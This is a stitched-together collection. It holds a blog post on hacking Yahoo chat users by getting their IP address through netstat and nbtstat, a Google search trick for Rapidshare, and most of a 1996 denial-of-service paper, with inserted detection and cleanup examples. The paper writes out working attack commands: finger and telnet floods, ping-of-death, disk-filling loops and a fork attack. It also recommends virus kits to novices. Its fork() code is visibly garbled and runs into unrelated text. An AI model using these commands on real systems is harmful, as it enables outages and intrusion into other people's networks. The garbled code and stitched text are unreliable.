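    """String comparison only: what a filter without normalisation does."""
    return urlsplit(url).hostname in blocklist


def blocked_canonical(url, blocklist):
    """Compare the normalised host, so every spelling of an address matches."""
    try:
        host = urlsplit(url).hostname or ""
    except ValueError:
        return True  # policy choice for this example: unparsable URLs fail closed
    return (canonical_ipv4(host) or host) in blocklist


# Constructed blocklist using the address from the worked example above.
BLOCKLIST = {"192.168.13.10"}

if __name__ == "__main__":
    for url in ("http://3232238858/", "http://0xC0A80D0A/",
                "http://0300.0250.015.012/", "http://192.168.3338/"):
        print(url, blocked_naive(url, BLOCKLIST), blocked_canonical(url, BLOCKLIST))
```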

Find who is Invisible on Yahoo messenger

Sometimes some of your friends who appear offline in Yahoo Messenger may not actually be offline; they may be in 'Invisible' mode. This may be because they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

First, open your Yahoo Messenger main window and double-click on the name of the person you want to check. The chat window will open.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle IMVironment there are two possibilities:

1. If the user is offline, the Doodle area will show "waiting for your friend to load Doodle" continuously.

2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed),So you know that the user is online.

Hack a Yahoo Account While Chatting

This is only for educational purposes. So whoever tries this does so at his own risk.
I am not sure that this will work 100%. But yes, it will work almost 70 percent of the time. But before that you need to know a few things about the Yahoo chat protocol.
Leave a comment here after you see the post and let me know whether it works or not; if you are having a problem, post here.
_________________________________________________________________________________________

Following are the features:
1) When we chat on Yahoo, everything goes through the server. That applies only when we chat, that is, to messages.
2) When we send files, Yahoo has 2 options:
a) Either it uploads the file and then the other client has to download it,
b) or it connects to the client directly and gets the files.
3) When we use video or audio:
a) It either goes through the server,
b) or it has a client-to-client connection.
And when we have a client-to-client connection the opponent's IP is revealed, on the 5051 port. So how do we exploit the chat user when he gets a direct connection? And how do we go about it? Remember, I am here to hack a system without using a TOOL, only by simple net commands and Yahoo chat techniques. That's what makes the difference between a real hacker and newbies.
So let's analyse:
1) It's impossible to get an attacker's IP address when you only chat.
2) There is a 50% chance of getting an IP address when you send files.
3) Again a 50% chance of getting the IP when you use video or audio.

So why wait? Let's exploit those 50% chances. I will explain only for files here; the same applies to video or audio.
1) Go to DOS and
type ->
netstat -n 3
You will get the following output. Just do not care and be cool.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Let me just explain what the output is in general. On the left-hand side is your IP address, and on the right-hand side is the IP address of the foreign machine and the port to which it is connected. OK, so what next?

2) Try sending a file to the target.
If the file comes from the server, that is, the file is uploaded, leave it; you will not get the IP. But if a direct connection is established,
HMMMM, then the attacker's first phase is over.
This is the output in your netstat. Port number 5101 is where the attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED

That's what is highlighted in RED. So what next?
3) Hmmm, OK, so make a DOS attack now.
Go to the DOS prompt and
just do
nbtstat -A (attacker's IP address). It can happen that if the system is not protected you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

OK, so you will now ask what next. No, you find out what you can do with this network rather than me explaining everything.



So the conclusion is: never exchange files, video or audio until you know that the user with whom you are chatting is not going to harm you.

Saturday, July 12, 2008

how to search google for RAPIDSHARE links

If you wanna find some apps, files etc on rapidshare.de via google, do the following.

Paste this into the Google search window (not the address bar):

site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412

* this searches the site rapidshare.de for any file that is rar or zip, and
has been indexed between 1-11 February.

dvd site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412

* this is the same search but it specifically searches for "dvd" with the same
search criteria, so any app posted with the word dvd in it will be found.

There are mainly three criteria to keep in mind when doing this search.

1. site: your site of choice to search

2. filetype: filetypes you wanna search,if you put a "OR" after the first
filetype you can add more.

3. daterange: (start date-enddate)

* this uses the "julian calendar", converter can be found here:

Code:
http://aa.usno.navy.mil/data/docs/JulianDate.html
Hans Husman
t95hhu@student.tdb.uu.se
Last updated: Mon Oct 28 14:56:31 MET 1996

.0. FOREWORD

.A. INTRODUCTION
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
.A.2.1. INTRODUCTION
.A.2.2. SUB-CULTURAL STATUS
.A.2.3. TO GAIN ACCESS
.A.2.4. REVENGE
.A.2.5. POLITICAL REASONS
.A.2.6. ECONOMICAL REASONS
.A.2.7. NASTINESS
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?

.B. SOME BASIC TARGETS FOR AN ATTACK
.B.1. SWAP SPACE
.B.2. BANDWIDTH
.B.3. KERNEL TABLES
.B.4. RAM
.B.5. DISKS
.B.6. CACHES
.B.7. INETD

.C. ATTACKING FROM THE OUTSIDE
.C.1. TAKING ADVANTAGE OF FINGER
.C.2. UDP AND SUNOS 4.1.3.
.C.3. FREEZING UP X-WINDOWS
.C.4. MALICIOUS USE OF UDP SERVICES
.C.5. ATTACKING WITH LYNX CLIENTS
.C.6. MALICIOUS USE OF telnet
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
.C.8. HOW TO DISABLE ACCOUNTS
.C.9. LINUX AND TCP TIME, DAYTIME
.C.10. HOW TO DISABLE SERVICES
.C.11. PARAGON OS BETA R1.4
.C.12. NOVELLS NETWARE FTP
.C.13. ICMP REDIRECT ATTACKS
.C.14. BROADCAST STORMS
.C.15. EMAIL BOMBING AND SPAMMING
.C.16. TIME AND KERBEROS
.C.17. THE DOT DOT BUG
.C.18. SUNOS KERNEL PANIC
.C.19. HOSTILE APPLETS
.C.20. VIRUS
.C.21. ANONYMOUS FTP ABUSE
.C.22. SYN FLOODING
.C.23. PING FLOODING
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
.C.26. FLEXlm
.C.27. BOOTING WITH TRIVIAL FTP

.D. ATTACKING FROM THE INSIDE
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
.D.2. CRASHING THE X-SERVER
.D.3. FILLING UP THE HARD DISK
.D.4. MALICIOUS USE OF eval
.D.5. MALICIOUS USE OF fork()
.D.6. CREATING FILES THAT IS HARD TO REMOVE
.D.7. DIRECTORY NAME LOOKUPCACHE
.D.8. CSH ATTACK
.D.9. CREATING FILES IN /tmp
.D.10. USING RESOLV_HOST_CONF
.D.11. SUN 4.X AND BACKGROUND JOBS
.D.12. CRASHING DG/UX WITH ULIMIT
.D.13. NETTUNE AND HP-UX
.D.14. SOLARIS 2.X AND NFS
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X

.E. DUMPING CORE
.E.1. SHORT COMMENT
.E.2. MALICIOUS USE OF NETSCAPE
.E.3. CORE DUMPED UNDER WUFTPD
.E.4. ld UNDER SOLARIS/X86

.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
.F.1. BASIC SECURITY PROTECTION
.F.1.1. INTRODUCTION
.F.1.2. PORT SCANNING
.F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.5. EXTRA SECURITY SYSTEMS
.F.1.6. MONITORING SECURITY
.F.1.7. KEEPING UP TO DATE
.F.1.8. READ SOMETHING BETTER
.F.2. MONITORING PERFORMANCE
.F.2.1. INTRODUCTION
.F.2.2. COMMANDS AND SERVICES
.F.2.3. PROGRAMS
.F.2.4. ACCOUNTING

.G. SUGGESTED READING
.G.1. INFORMATION FOR DEEPER KNOWLEDGE
.G.2. KEEPING UP TO DATE INFORMATION
.G.3. BASIC INFORMATION

.H. COPYRIGHT

.I. DISCLAIMER

.0. FOREWORD
------------

In this paper I have tried to answer the following questions:

- What is a denial of service attack?
- Why would someone crash a system?
- How can someone crash a system?
- How do I protect a system against denial of service attacks?

I also have a section called SUGGESTED READING where you can find
pointers to good free information that can give you a deeper
understanding of a subject.

Note that I have very limited experience with Macintosh, OS/2 and
Windows, and most of the material is therefore for Unix use.

You can always find the latest version at the following address:
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT

Feel free to send comments, tips and so on to address:
t95hhu@student.tdb.uu.se

.A. INTRODUCTION
~~~~~~~~~~~~~~~~

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
-----------------------------------------

Denial of service is about knocking off services without
permission, for example by crashing the whole system. These
kinds of attacks are easy to launch and it is hard to protect
a system against them. The basic problem is that Unix
assumes that users on the system or on other systems will be
well behaved.

.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
---------------------------------------

.A.2.1. INTRODUCTION
--------------------

Why would someone crash a system? I can think of several reasons,
each of which I have presented more precisely in its own section,
but in short:

.1. Sub-cultural status.
.2. To gain access.
.3. Revenge.
.4. Political reasons.
.5. Economical reasons.
.6. Nastiness.

I think that number one and six are the more common today, but that
number four and five will be the more common ones in the future.

.A.2.2. SUB-CULTURAL STATUS
---------------------------

After all the information about syn flooding, a bunch of such attacks
were launched around Sweden. The vast majority of these attacks were
not part of an IP-spoof attack; they were "only" denial of service
attacks. Why?

I think that hackers attack systems as a sub-cultural pseudo career
and I think that many denial of service attacks, and here in the
example syn flooding, were performed for these reasons. I also think
that many hackers begin their career with denial of service attacks.

.A.2.3. TO GAIN ACCESS
----------------------

Sometimes a denial of service attack could be a part of an attack to
gain access to a system. At the moment I can think of these reasons
and specific holes:

.1. Some older X-lock versions could be crashed with a
method from the denial of service family, leaving the system
open. Physical access was needed to use the work space afterwards.

.2. Syn flooding could be a part of an IP-spoof attack method.

.3. Some program systems could have holes during startup
that could be used to gain root, for example SSH (secure shell).

.4. During an attack it could be useful to crash other machines
in the network or to deny certain persons the ability to access
the system.

.5. A system being booted could also sometimes be subverted,
especially rarp-boots. If we know which port the machine listens
to (69 could be a good guess) during the boot we can send false
packets to it and almost totally control the boot.

.A.2.4. REVENGE
---------------

A denial of service attack could be a part of a revenge against a user
or an administrator.

.A.2.5. POLITICAL REASONS
-------------------------

Sooner or later new or old organizations will understand the potential
of destroying computer systems and find tools to do it.

For example, imagine Bank A lending company B money to build a
factory that threatens the environment. Organization C therefore crashes
A's computer system, maybe with help from an employee. The attack could
cost A a great deal of money if the timing is right.

.A.2.6. ECONOMICAL REASONS
--------------------------

Imagine the small company A moving into a business totally dominated by
company B. A's and B's customers place their orders by computer and depend
heavily on the order being carried out within a specific time (A and B
could be stock trading companies). If A and B can't perform the order the
customers lose money and change company.

As a part of a business strategy A pays a computer expert a sum of money to
get him to crash B's computer systems a number of times. A year later A
is the dominating company.

.A.2.7. NASTINESS
-----------------

I know a person that found a workstation where the user had forgotten to
logout. He sat down and wrote a program that made a kill -9 -1 at a
random time at least 30 minutes after the login time and placed a call to
the program from the profile file. That is nastiness.

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
---------------------------------------------

This is a hard question to answer and I don't think that it will
give anything to compare different Unix platforms. You can't say that
one Unix is more secure against denial of service, it is all up to the
administrator.

A comparison between Windows 95 and NT on one side and Unix on the
other could however be interesting.

Unix systems are much more complex and have hundreds of built-in programs,
services... This always opens up many ways to crash the system from
the inside.

In the normal Windows NT and 95 network there are few ways to crash
the system, although there are methods that will always work.

That means that no big difference between Microsoft and Unix can
be seen regarding the inside attacks. But there are a couple of
points left:

- Unix has many more tools and programs to discover an
attack and monitor the users. To watch what another user
is up to under Windows is very hard.

- The average Unix administrator probably also has much more
experience than the average Microsoft administrator.

The last two points mean that Unix is more secure against inside
denial of service attacks.

A comparison between Microsoft and Unix regarding outside attacks
is much more difficult. However I would like to say that the average
Microsoft system on the Internet is more secure against outside
attacks, because it normally has far fewer services.

.B. SOME BASIC TARGETS FOR AN ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.B.1. SWAP SPACE
----------------

Most systems have several hundred Mbytes of swap space to
service client requests. The swap space is typically used
for forked child processes which have a short life time.
The swap space will therefore almost never be used heavily
in the normal case. A denial of service could be based
on a method that tries to fill up the swap space.

.B.2. BANDWIDTH
---------------

If the bandwidth is too high the network will be useless. Most
denial of service attacks influence the bandwidth in some way.

.B.3. KERNEL TABLES
-------------------

It is trivial to overflow the kernel tables, which will cause
serious problems on the system. Systems with write-through
caches and small write buffers are especially sensitive.

Kernel memory allocation is also a sensitive target.
The kernel has a kernelmap limit; if the system reaches this
limit it cannot allocate more kernel memory and must be rebooted.
The kernel memory is not only used for RAM, CPUs, screens and so
on, it is also used for ordinary processes. This means that any system
can be crashed, and with a mean (or in some sense good) algorithm pretty
fast.

For Solaris 2.X the sar command measures and reports
how much kernel memory the system is using, but for SunOS 4.X there
is no such command, meaning that under SunOS 4.X you can't even
get a warning. If you do use Solaris you should write sar -k 1 to
get the information. netstat -k can also be used and shows how much
memory the kernel has allocated in the subpaging.

.B.4. RAM
---------

A denial of service attack that allocates a large amount of RAM
can cause a great deal of problems. NFS and mail servers are
actually extremely sensitive because they do not need much
RAM and therefore often don't have much RAM. An attack on
an NFS server is trivial. The normal NFS client will do a
great deal of caching, but an NFS client can be anything,
including the program you wrote yourself...

.B.5. DISKS
-----------

A classic attack is to fill up the hard disk, but an attack on
the disks can be so much more. For example, an overloaded disk
can be misused in many ways.

.B.6. CACHES
-------------

A denial of service attack involving caches can be based on a method
to block the cache or to avoid the cache.

These caches are found on Solaris 2.X:

Directory name lookup cache: Associates the name of a file with a vnode.

Inode cache: Cache information read from disk in case it is needed
again.

Rnode cache: Holds information about the NFS filesystem.

Buffer cache: Cache inode indirect blocks and cylinders to realed disk
I/O.

.B.7. INETD
-----------

Once inetd has crashed, all other services running through inetd
will no longer work.


.C. ATTACKING FROM THE OUTSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


.C.1. TAKING ADVANTAGE OF FINGER
--------------------------------

Most fingerd installations support redirections to another host.

Ex:

$finger @system.two.com@system.one.com

finger will in the example go through system.one.com and on to
system.two.com. As far as system.two.com knows it is system.one.com
who is fingering. So this method can be used for hiding, but also
for a very dirty denial of service attack. Look at this:

$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack

All those @ signs will get finger to finger host.we.attack again and
again and again... The effect on host.we.attack is powerful and
the result is high bandwidth, little free memory and a hard disk with
less free space, due to all the child processes (compare with .D.5.).

The solution is to install a fingerd which doesn't support redirections,
for example GNU finger. You could also turn the finger service off,
but I think that is just a bit too much.

.C.2. UDP AND SUNOS 4.1.3.
--------------------------

SunOS 4.1.3. is known to boot if a packet with incorrect information
in the header is sent to it. This is the case if the ip_options
indicate a wrong size of the packet.

The solution is to install the proper patch.

.C.3. FREEZING UP X-WINDOWS
---------------------------

If a host accepts a telnet session to the X-Windows port (generally
somewhere between 6000 and 6025, in most cases 6000), that could
be used to freeze up the X-Windows system. This can be done with
multiple telnet connections to the port or with a program which
sends multiple XOpenDisplay() to the port.

The same thing can happen to Motif or Open Windows.

The solution is to deny connections to the X-Windows port.

.C.4. MALICIOUS USE OF UDP SERVICES
-----------------------------------

It is simple to get UDP services (echo, time, daytime, chargen) to
loop, due to trivial IP-spoofing. The effect can be high bandwidth
that causes the network to become useless. In the example the header
claims that the packet came from 127.0.0.1 (loopback) and the target
is the echo port at system.we.attack. As far as system.we.attack knows,
127.0.0.1 is system.we.attack, and the loop has been established.

Ex:

from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7

Note that the name system.we.attack looks like a DNS-name, but the
target should always be represented by the IP-number.

Quoted from proberts@clark.net (Paul D. Robertson) comment on
comp.security.firewalls on matter of "Introduction to denial of service"

" A great deal of systems don't put loopback on the wire, and simply
emulate it. Therefore, this attack will only effect that machine
in some cases. It's much better to use the address of a different
machine on the same network. Again, the default services should
be disabled in inetd.conf. Other than some hacks for mainframe IP
stacks that don't support ICMP, the echo service isn't used by many
legitimate programs, and TCP echo should be used instead of UDP
where it is necessary. "

.C.5. ATTACKING WITH LYNX CLIENTS
---------------------------------

A World Wide Web server will fork an httpd process in response
to a request from a client, typically Netscape or Mosaic. The process
lasts for less than one second and the load will therefore never
show up if someone uses ps. In most cases it is therefore very
safe to launch a denial of service attack that makes use of
multiple W3 clients, typically lynx clients. But note that the netstat
command could be used to detect the attack (thanks to Paul D. Robertson).

Some httpds (for example http-gw) will have problems besides the normal
high bandwidth, low memory... And the attack can in those cases get
the server to loop (compare with .C.6.)

.C.6. MALICIOUS USE OF telnet
-----------------------------

Study this little script:

Ex:

while : ; do
telnet system.we.attack &
done

An attack using this script might eat some bandwidth, but it is
nothing compared to the finger method or most other methods. Well,
the point is that some pretty common firewalls and httpds think
that the attack is a loop and shut themselves down until the
administrator sends kill -HUP.

This is a simple high risk vulnerability that should be checked
and if present fixed.

.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
-----------------------------------------------

If the attacker makes a telnet connection to the Solaris 2.4 host and
quits using:

Ex:

Control-}
quit

then inetd will keep going "forever". Well, a couple of hundred...

The solution is to install the proper patch.

.C.8. HOW TO DISABLE ACCOUNTS
-----------------------------

Some systems disable an account after N number of bad logins, or waits
N seconds. You can use this feature to lock out specific users from
the system.

.C.9. LINUX AND TCP TIME, DAYTIME
----------------------------------

Inetd under Linux is known to crash if too many SYN packets are sent to
daytime (port 13) and/or time (port 37).

The solution is to install the proper patch.

.C.10. HOW TO DISABLE SERVICES
------------------------------

Most Unix systems disable a service after N sessions have been
open in a given time. Well most systems have a reasonable default
(lets say 800 - 1000), but not some SunOS systems that have the
default set to 48...

The solution is to set the number to something reasonable.

.C.11. PARAGON OS BETA R1.4
---------------------------

If someone redirects an ICMP (Internet Control Message Protocol) packet
to a Paragon OS beta R1.4 machine, the machine will freeze up and must be
rebooted. An ICMP redirect tells the system to override routing
tables. Routers use this to tell the host that it is sending
to the wrong router.

The solution is to install the proper patch.

.C.12. NOVELLS NETWARE FTP
--------------------------

Novells Netware FTP server is known to get short of memory if multiple
ftp sessions connects to it.

.C.13. ICMP REDIRECT ATTACKS
----------------------------

Gateways use ICMP redirect to tell the system to override routing
tables, that is, telling the system to take a better route. To be able
to misuse ICMP redirection we must know an existing connection
(well, we could make one for ourselves, but there is not much use for that).
If we have found a connection we can send a route that
loses its connectivity, or we could send false messages to the host
if the connection we have found doesn't use encryption.

Ex: (false messages to send)

DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG

The effect of such messages is a reset of the connection.

The solution could be to turn ICMP redirects off; there is not much
proper use for the service.

.C.14. BROADCAST STORMS
-----------------------

This is a very popular method in networks where all of the hosts are
acting as gateways.

There are many versions of the attack, but the basic method is to
send a lot of packets to all hosts in the network with a destination
that doesn't exist. Each host will try to forward each packet so
the packets will bounce around for a long time. And if new packets
keep coming the network will soon be in trouble.

Services that can be misused as tools in this kind of attack are for
example ping, finger and sendmail. But most services can be misused
in some way or another.

.C.15. EMAIL BOMBING AND SPAMMING
---------------------------------

In an email bombing attack the attacker will repeatedly send identical
email messages to an address. The effect on the target is high bandwidth,
a hard disk with less space and so on... Email spamming is about sending
mail to all (or rather many) of the users of a system. The point of
using spamming instead of bombing is that some users will try to
send a reply, and if the address is false the mail will bounce back. In
that case one mail has turned into three mails. The effect on the
bandwidth is obvious.

There is no way to prevent email bombing or spamming. However have
a look at CERT:s paper "Email bombing and spamming".

.C.16. TIME AND KERBEROS
------------------------

If the source and target machines are not closely aligned in time, the
ticket will be rejected. That means that if the protocol that sets the
time is not protected, it will be possible to put a Kerberos server out
of function.

.C.17. THE DOT DOT BUG
----------------------

The Windows NT file sharing system is vulnerable to the dot dot bug
(dot dot as in ..) made famous under Windows 95, meaning that anyone can
crash the system. If someone sends a "DIR ..\" to the workstation, a
STOP message will appear on the screen of the Windows NT computer. Note
that it applies to versions 3.50 and 3.51 for both the workstation and
server versions.

The solution is to install the proper patch.

.C.18. SUNOS KERNEL PANIC
-------------------------

Some SunOS systems (running TIS?) will get a kernel panic if a
getsockopt() is done after a connection has been reset.

The solution could be to install Sun patch 100804.

.C.19. HOSTILE APPLETS
----------------------

A hostile applet is any applet that attempts to use your system
in an inappropriate manner. The problems in the java language
could be sorted in two main groups:

1) Problems due to bugs.
2) Problems due to features in the language.

In group one we have for example the java bytecode verifier bug, which
makes it possible for an applet to execute any command that the user
can execute. This means that all the attack methods described in .D.X.
could be executed through an applet. The java bytecode verifier bug
was discovered in late March 1996 and no patch has yet been made available
(correct me if I'm wrong!!!).

Note that two other bugs could be found in group one, but they
are both fixed in Netscape 2.01 and JDK 1.0.1.

Group two is more interesting, and one large problem found is the
fact that java can connect to the ports. This means that all the methods
described in .C.X. can be performed by an applet. More information
and examples can be found at this address:

http://www.math.gatech.edu/~mladue/HostileArticle.html

If you need a high level of security you should use some sort of
firewall for protection against java. As a user you could have
java disabled.

.C.20. VIRUS
------------

Computer viruses are written for the purpose of spreading and
destroying systems. Viruses are still the most common and famous
denial of service attack method.

It is a misunderstanding that virus writing is hard. If you know
assembly language and have source code for a couple of viruses it
is easy. Several automatic toolkits for virus construction can
also be found, for example:

* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).

PS-MPC and VCL are known to be the best and can help the novice programmer
to learn how to write viruses.

An automatic tool called MtE can also be found. MtE will transform
a virus into a polymorphic virus. The polymorphic engine of MtE is well
known and should easily be caught by any scanner.

.C.21. ANONYMOUS FTP ABUSE
--------------------------

If an anonymous FTP archive has a writable area it could be misused
for a denial of service attack similar to .D.3. That is, we can
fill up the hard disk.

A host can also become temporarily unusable through massive numbers of
FTP requests.

For more information on how to protect an anonymous FTP site,
CERT's "Anonymous FTP Abuses" could be a good start.

.C.22. SYN FLOODING
-------------------

Both 2600 and Phrack have posted information about the syn flooding attack.
2600 have also posted exploit code for the attack.

As we know, the syn packet is used in the 3-way handshake. The syn flooding
attack is based on an incomplete handshake. That is, the attacking host
will send a flood of syn packets but will not respond with an ACK packet.
The TCP/IP stack will wait a certain amount of time before dropping
the connection; a syn flooding attack will therefore keep the syn_received
connection queue of the target machine filled.

The syn flooding attack is very hot and it is easy to find more information
about it, for example:

[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".

[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine
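
The filled syn_received queue described in this section is visible from the target itself in netstat output. The following is an added example, not part of the paper: it counts half-open TCP connections per listening port and reports the ports over a limit. The sample lines, the function names and the threshold are constructed for the illustration.

```python
import re
from collections import Counter, defaultdict

# Constructed `netstat -n` excerpt (documentation addresses), not real traffic.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address      Foreign Address       State
tcp        0      0 192.0.2.10:80      198.51.100.7:40112    ESTABLISHED
tcp        0      0 192.0.2.10:80      203.0.113.5:1027      SYN_RECV
tcp        0      0 192.0.2.10:80      203.0.113.77:2310     SYN_RECV
tcp        0      0 192.0.2.10:80      198.51.100.201:5531   SYN_RECV
tcp        0      0 192.0.2.10:80      203.0.113.140:1199    SYN_RECV
tcp        0      0 192.0.2.10:25      198.51.100.9:33010    SYN_RECV
tcp        0      0 192.0.2.10:22      198.51.100.7:40990    ESTABLISHED
"""

# The half-open state is spelled differently by different systems.
HALF_OPEN = {"SYN_RECV", "SYN_RCVD", "SYN_RECEIVED"}


def _split_endpoint(endpoint):
    """Split 'addr:port' or 'addr.port' into (addr, port); port None if absent."""
    m = re.fullmatch(r"(.+)[:.](\d+)", endpoint)
    return (m.group(1), int(m.group(2))) if m else (endpoint, None)


def half_open_by_port(netstat_text):
    """Map local port -> (half-open count, set of remote addresses seen)."""
    counts = Counter()
    sources = defaultdict(set)
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].lower().startswith("tcp"):
            continue
        if fields[-1].upper() not in HALF_OPEN:
            continue
        # The two fields before the state are the local and foreign endpoints.
        local, foreign = fields[-3], fields[-2]
        port = _split_endpoint(local)[1]
        if port is None:
            continue
        counts[port] += 1
        sources[port].add(_split_endpoint(foreign)[0])
    return {port: (counts[port], sources[port]) for port in counts}


def backlog_alerts(netstat_text, threshold):
    """Return (port, half_open, distinct_sources) for ports at or over threshold.

    The count is kept per local port, not per source address: the source
    addresses of a flood can be forged, so a per-source limit would miss it.
    """
    alerts = []
    for port, (count, srcs) in sorted(half_open_by_port(netstat_text).items()):
        if count >= threshold:
            alerts.append((port, count, len(srcs)))
    return alerts


if __name__ == "__main__":
    for port, count, nsrc in backlog_alerts(SAMPLE_NETSTAT, threshold=3):
        print(f"port {port}: {count} half-open connections from {nsrc} sources")
```

A realistic threshold depends on the service's normal load, so it is best set from a baseline taken while the host is healthy.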

.C.23. PING FLOODING
--------------------

I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.

Under Unix we could try something like: ping -s host
to send 64 bytes packets.

If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------

The subnet mask reply message is used during the reboot, but some
hosts are known to accept the message at any time without any check.
If so, all communication to or from the host is turned off; it's dead.

The host should not accept the message at any time other than during
the reboot.

.C.26. FLEXlm
-------------

Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#

.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------

To boot diskless workstations one often uses trivial ftp with rarp or
bootp. If not protected, an attacker can use tftp to boot the host.


.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------

Solaris 2.3 will get a kernel panic if this
is executed:

EX:

$ndd /dev/udp udp_status

The solution is to install the proper patch.

.D.2. CRASHING THE X-SERVER
---------------------------

If the sticky bit is not set on /tmp then the file /tmp/.x11-unix/x0
can be removed and the X server will crash.

Ex:

$ rm /tmp/.x11-unix/x0

.D.3. FILLING UP THE HARD DISK
-----------------------------

If your hard disk space is not limited by a quota or if you can use
/tmp then it's possible for you to fill up the file system.

Ex:

while : ;
do
mkdir .xxx
cd .xxx
done

.D.4. MALICIOUS USE OF eval
---------------------------

Some older systems will crash if eval '\!\!' is executed in the
C-shell.

Ex:

% eval '\!\!'

.D.5. MALICIOUS USE OF fork()
-----------------------------

If someone executes this C++ program the result will be a crash
on most systems.

Ex:

#include
#include
#include

main()
{
int x;
while(x=0;x<1000000;x++)> -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$

Ex.II.

$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$

(You see, the size does count!)

Other well-known methods are files with odd characters or spaces
in the name.

These methods could be used in combination with ".D.3 FILLING UP THE
HARD DISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindows' File
Manager. You can also try to use: rm ./. It should work for
the first example if you have a shell.
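
The removal problem described above can be handled from a script. The following is an added example, not part of the original paper; the function names and the scratch directory are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: removing files whose names confuse rm or the shell.

# Remove a file by name. The "./" prefix stops a leading "-" from being read
# as an option (the failure shown in Ex.I); "--" does the same on any rm that
# supports it. Callers single-quote names containing "!" so that an
# interactive shell does not attempt history expansion (Ex.II).
remove_by_name() {
    ( cd "$1" && rm -f -- "./$2" )
}

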